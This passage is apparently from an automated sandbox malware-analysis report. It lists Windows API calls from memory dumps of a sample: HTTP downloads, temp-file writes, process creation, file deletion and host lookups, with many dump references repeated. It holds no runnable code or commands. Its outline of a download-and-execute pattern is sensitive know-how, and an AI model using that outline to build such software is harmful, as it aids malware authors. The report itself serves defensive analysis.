                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  Strings
                  • SeTakeOwnershipPrivilege, xrefs: 00183149
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 00177292
                  • WinHttpCrackUrl.WINHTTP(?,00000000,00000000,?,?,?,001804FF), ref: 001772B7
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,?,?,?,001804FB,?,?,?,?,001804FF), ref: 0017734E
                  • WinHttpSetTimeouts.WINHTTP(00000000,00015F90,00015F90,0002BF20,0017D31E,?,001804FB,?,?,?,?,001804FF), ref: 0017737B
                  • WinHttpConnect.WINHTTP(00000000,0017D31E,00000000,00000000,?,001804FB,?,?,?,?,001804FF), ref: 0017738A
                  • WinHttpOpenRequest.WINHTTP(00000000,?,?,00000000,00000000,00000000,00800000,?,?,?,?,?,001804FB), ref: 001773EB
                  • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,001804FB), ref: 00177408
                  • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 00177419
                  • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,0000000C,00000000,?,?,?,?,?,001804FB,?,?,?,?), ref: 00177440
                  • WinHttpQueryDataAvailable.WINHTTP(00000000,00000004,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 0017746C
                  • WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,001804FB,?,?,?,?), ref: 001774AD
                    • Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                    • Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                  • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 001774D7
                  • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,?,?,001804FB,?,?,?,?,001804FF), ref: 001774E1
                  • WinHttpCloseHandle.WINHTTP(?,?,001804FB,?,?,?,?,001804FF), ref: 001774EB
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 0017DB4E
                  • WinHttpSetTimeouts.WINHTTP(?,00015F90,00015F90,002932E0,0002BF20,00000000,00000000), ref: 0017DB6F
                  • WinHttpOpenRequest.WINHTTP(?,?,00000004,00000000,00000000,00000000,?), ref: 0017DBA6
                  • WinHttpSetOption.WINHTTP(00000000,0000001F,00000004,00000004), ref: 0017DBCC
                  • WinHttpSendRequest.WINHTTP(?,?,?,?,?,?,00000000), ref: 0017DBEF
                  • WinHttpReceiveResponse.WINHTTP(?,00000000), ref: 0017DBFE
                  • WinHttpQueryHeaders.WINHTTP(?,20000013,00000000,?,00000004,00000000), ref: 0017DC1B
                  • WinHttpCloseHandle.WINHTTP(?,00000000,00000000), ref: 0017DC42
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 0017AD77
                    • Part of subcall function 00182DB0: tolower.MSVCRT ref: 00182DEB
                  • SysFreeString.OLEAUT32(?), ref: 0017AC38
                  • SysFreeString.OLEAUT32(?), ref: 0017AC49
                  • SysAllocString.OLEAUT32(?), ref: 0017ACD4
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • _wtoi.MSVCRT ref: 0017ACA4
                    • Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E008
                    • Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E015
                    • Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E022
                    • Part of subcall function 0017DF60: ??2@YAPAXI@Z.MSVCRT ref: 0017E0F5
                    • Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E149
                    • Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E153
                    • Part of subcall function 0017DF60: SysFreeString.OLEAUT32(?), ref: 0017E15D
                    • Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 00174028
                    • Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 0017403D
                    • Part of subcall function 00173F10: _wtoi.MSVCRT ref: 001740EE
                    • Part of subcall function 00173F10: rand.MSVCRT ref: 00174160
                    • Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 0017430F
                    • Part of subcall function 00173F10: SysFreeString.OLEAUT32(?), ref: 0017431D
                  • SysFreeString.OLEAUT32(?), ref: 0017AD69
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 0018265F
                  • CreateProcessA.KERNEL32(00000000,00182798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 00182698
                  • WaitForSingleObject.KERNEL32(?,00002710), ref: 001826AE
                  • CloseHandle.KERNEL32(?), ref: 001826BE
                  • CloseHandle.KERNEL32(?), ref: 001826C4
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00173350: ??3@YAXPAX@Z.MSVCRT ref: 00173371
                  • SysFreeString.OLEAUT32(?), ref: 0017E008
                  • SysFreeString.OLEAUT32(?), ref: 0017E015
                  • SysFreeString.OLEAUT32(?), ref: 0017E022
                    • Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B318
                    • Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B321
                  • ??2@YAPAXI@Z.MSVCRT ref: 0017E0F5
                    • Part of subcall function 00180C60: ??2@YAPAXI@Z.MSVCRT ref: 00180C8F
                    • Part of subcall function 00172200: SysAllocString.OLEAUT32(?), ref: 00172211
                    • Part of subcall function 00172200: SysAllocString.OLEAUT32(?), ref: 00172219
                  • SysFreeString.OLEAUT32(?), ref: 0017E149
                  • SysFreeString.OLEAUT32(?), ref: 0017E153
                  • SysFreeString.OLEAUT32(?), ref: 0017E15D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 00174028
                  • SysFreeString.OLEAUT32(?), ref: 0017403D
                  • _wtoi.MSVCRT ref: 001740EE
                  • rand.MSVCRT ref: 00174160
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • SysFreeString.OLEAUT32(?), ref: 0017430F
                  • SysFreeString.OLEAUT32(?), ref: 0017431D
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 0017C149
                  • SysFreeString.OLEAUT32(?), ref: 0017C15E
                  • _wtoi.MSVCRT ref: 0017C215
                  • rand.MSVCRT ref: 0017C260
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • SysFreeString.OLEAUT32(?), ref: 0017C3AE
                  • SysFreeString.OLEAUT32(?), ref: 0017C3BC
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 00182C56
                  • ??2@YAPAXI@Z.MSVCRT ref: 00182C90
                  • ??2@YAPAXI@Z.MSVCRT ref: 00182CDB
                  • ??3@YAXPAX@Z.MSVCRT ref: 00182D9E
                    • Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                    • Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                  • ??3@YAXPAX@Z.MSVCRT ref: 00182D75
                  • ??3@YAXPAX@Z.MSVCRT ref: 00182D8A
                    • Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01
                    • Part of subcall function 00171F50: memcpy.MSVCRT ref: 00171FEC
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memset.MSVCRT ref: 001826EC
                  • GetTempPathA.KERNEL32(00000104,?), ref: 00182700
                    • Part of subcall function 00182600: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 0018261A
                    • Part of subcall function 00182600: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00182631
                    • Part of subcall function 00182600: CloseHandle.KERNEL32(00000000), ref: 00182638
                    • Part of subcall function 00182650: memset.MSVCRT ref: 0018265F
                    • Part of subcall function 00182650: CreateProcessA.KERNEL32(00000000,00182798,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 00182698
                    • Part of subcall function 00182650: WaitForSingleObject.KERNEL32(?,00002710), ref: 001826AE
                    • Part of subcall function 00182650: CloseHandle.KERNEL32(?), ref: 001826BE
                    • Part of subcall function 00182650: CloseHandle.KERNEL32(?), ref: 001826C4
                  • DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 0018279F
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 0017840C
                  • SysAllocString.OLEAUT32(?), ref: 00178561
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  • SysFreeString.OLEAUT32(?), ref: 0017841D
                    • Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 001731A8
                    • Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 001731BD
                    • Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 00173320
                    • Part of subcall function 00173150: SysFreeString.OLEAUT32(?), ref: 0017332E
                    • Part of subcall function 00172300: SysFreeString.OLEAUT32(?), ref: 001723B8
                    • Part of subcall function 00172300: SysFreeString.OLEAUT32(?), ref: 001724BB
                    • Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 0017551E
                    • Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 0017552F
                    • Part of subcall function 00175460: _wtoi.MSVCRT ref: 0017563B
                    • Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 00175685
                    • Part of subcall function 00175460: SysFreeString.OLEAUT32(?), ref: 00175693
                  • SysFreeString.OLEAUT32(?), ref: 0017867C
                  • SysFreeString.OLEAUT32(?), ref: 0017868A
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 001752C0: SysFreeString.OLEAUT32(00000000), ref: 001752D7
                    • Part of subcall function 001752C0: SysFreeString.OLEAUT32(00000001), ref: 001752E5
                  • SysFreeString.OLEAUT32(?), ref: 0017551E
                  • SysFreeString.OLEAUT32(?), ref: 0017552F
                    • Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B318
                    • Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B321
                  • _wtoi.MSVCRT ref: 0017563B
                  • SysFreeString.OLEAUT32(?), ref: 00175685
                  • SysFreeString.OLEAUT32(?), ref: 00175693
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 00179F28
                  • SysFreeString.OLEAUT32(?), ref: 00179F39
                  • _wtoi.MSVCRT ref: 00179FA5
                    • Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C149
                    • Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C15E
                    • Part of subcall function 0017C060: _wtoi.MSVCRT ref: 0017C215
                    • Part of subcall function 0017C060: rand.MSVCRT ref: 0017C260
                    • Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C3AE
                    • Part of subcall function 0017C060: SysFreeString.OLEAUT32(?), ref: 0017C3BC
                  • SysFreeString.OLEAUT32(?), ref: 0017A036
                  • SysFreeString.OLEAUT32(?), ref: 0017A044
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WSAStartup.WS2_32(00000202,?), ref: 00179ADA
                  • freeaddrinfo.WS2_32(00000000,0018043A), ref: 00179B3B
                    • Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52
                  • getaddrinfo.WS2_32(0018043A,00000000,?,00000000), ref: 00179BD6
                  • freeaddrinfo.WS2_32(00000000), ref: 00179C1E
                  • WSACleanup.WS2_32 ref: 00179C44
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WSAStartup.WS2_32(00000202,?), ref: 001814E2
                  • gethostname.WS2_32(?,000000FF), ref: 00181502
                  • getaddrinfo.WS2_32(?,00000000,00000000,00000000), ref: 00181522
                  • freeaddrinfo.WS2_32(00000000), ref: 00181580
                  • WSACleanup.WS2_32 ref: 00181586
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00177208
                  • GetCurrentProcessId.KERNEL32 ref: 00177214
                  • GetCurrentThreadId.KERNEL32 ref: 0017721C
                  • GetTickCount.KERNEL32 ref: 00177224
                  • QueryPerformanceCounter.KERNEL32(?), ref: 00177230
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017E7A0: CoCreateInstance.OLE32(00184254,00000000,00000001,00184264,00000000,00176AB4,?,00000000), ref: 0017E7DC
                  • _time64.MSVCRT ref: 00174D6F
                  • _time64.MSVCRT ref: 00174DAB
                    • Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                  • Sleep.KERNEL32(00001388), ref: 00174E40
                    • Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                    • Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                  • _time64.MSVCRT ref: 00174EF8
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 00180E20: _vsnwprintf.MSVCRT ref: 00180E52
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B318
                    • Part of subcall function 0017B300: SysFreeString.OLEAUT32(?), ref: 0017B321
                  • SysFreeString.OLEAUT32(?), ref: 001731A8
                  • SysFreeString.OLEAUT32(?), ref: 001731BD
                    • Part of subcall function 00180DF0: SysAllocString.OLEAUT32(?), ref: 00180E03
                    • Part of subcall function 0017F560: SysAllocString.OLEAUT32(?), ref: 0017F574
                  • SysFreeString.OLEAUT32(?), ref: 00173320
                  • SysFreeString.OLEAUT32(?), ref: 0017332E
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00175A90: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                  • ??2@YAPAXI@Z.MSVCRT ref: 0017207A
                  • ??3@YAXPAX@Z.MSVCRT ref: 001721CF
